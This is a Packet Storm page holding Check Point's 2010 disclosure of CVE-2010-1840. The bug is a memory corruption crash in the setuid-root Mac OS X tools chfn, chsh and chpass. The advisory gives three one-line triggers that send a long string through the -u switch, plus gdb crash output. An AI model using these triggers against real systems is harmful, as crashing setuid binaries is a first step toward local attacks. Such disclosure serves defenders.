exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

Apple Directory Services Memory Corruption

Apple Directory Services Memory Corruption
Posted Nov 11, 2010
Authored by Rodrigo Rubira Branco

Apple Directory Services suffers from a memory corruption vulnerability.

tags | advisory
systems | apple
advisories | CVE-2010-1840
SHA-256 | 8481c28235d20fa0485ba7450f678bb97a628f8d197b96a6443f807b2cf74e70

Apple Directory Services Memory Corruption

Change Mirror Download
Check Point Software Technologies - Vulnerability Discovery Team (VDT)
http://www.checkpoint.com/defense/

Apple Directory Services Memory Corruption
CVE-2010-1840


INTRODUCTION

chfn, chpass and chsh dos not properly parse authname switch ("-u"), which causes the applications to crash when parsing a long string. Those binaries are setuid root by default.

This problem was confirmed in the following versions of Apple binaries and MacOS, other versions may be also affected:

Apple Mac OS X 10.5.8 32bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh
Apple Mac OS X 10.6.2 64bits /usr/bin/chfn, /usr/bin/chpass, /usr/bin/chsh


CVSS Scoring System

The CVSS score is: 3.3
Base Score: 4.2
Temporal Score: 3.3
We used the following values to calculate the scores:
Base score is: AV:L/AC:L/Au:R/C:C/I:C/A:C
Temporal score is: E:POC/RL:OF/RC:C


TRIGGERING THE PROBLEM

/usr/bin/chfn -u `perl -e 'print "A" x 3000'`
/usr/bin/chsh -u `perl -e 'print "A" x 3000'`
/usr/bin/chpass -u `perl -e 'print "A" x 3000'`


DETAILS

Disassembly:

0x92237215 <CFArrayGetValueAtIndex+101>: mov $0x28,%al
0x92237217 <CFArrayGetValueAtIndex+103>: cmp $0xc,%ecx
0x9223721a <CFArrayGetValueAtIndex+106>: mov $0x14,%dl
0x9223721c <CFArrayGetValueAtIndex+108>: cmovne %edx,%eax
0x9223721f <CFArrayGetValueAtIndex+111>: add %esi,%eax
0x92237221 <CFArrayGetValueAtIndex+113>: mov 0xc(%ebp),%edx
0x92237224 <CFArrayGetValueAtIndex+116>: lea (%eax,%edx,4),%eax
0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax <----- Crash here.

(gdb) x/i $pc
0x92237227 <CFArrayGetValueAtIndex+119>: mov (%eax),%eax
(gdb) i r $eax
eax 0x585d910 92657936
(gdb) bt
#0 0x92237227 in CFArrayGetValueAtIndex ()
#1 0x9225c46b in _CFBundleTryOnePreferredLprojNameInDirectory ()
#2 0x9225d80c in _CFBundleAddPreferredLprojNamesInDirectory ()
#3 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#4 0x9225d8da in _CFBundleAddPreferredLprojNamesInDirectory ()
#5 0x9224b7b0 in _CFBundleGetLanguageSearchList ()
#6 0x9225b50c in CFBundleCopyResourceURL ()
#7 0x9225bb32 in CFBundleCopyLocalizedString ()
#8 0x903633eb in _ODNodeSetCredentials ()
#9 0x90369813 in ODRecordSetNodeCredentials ()
#10 0x000044be in ?? ()
#11 0x000026ac in ?? ()
#12 0x000022ee in ?? ()


The MacOS Heap Protection mechanisms mitigates the impact of this vulnerability.


CREDITS

This vulnerability was researched by Rodrigo Rubira Branco from Check Point Vulnerability Discovery Team (VDT).

ACKNOWLEDGES

Many thanks to Rafael Silva who brought the issue in chfn binary to our attention.




--
Rodrigo Rubira Branco
Senior Security Researcher
Vulnerability Discovery Team (VDT)
Check Point Software Technologies
http://www.checkpoint.com/defense
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    42 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close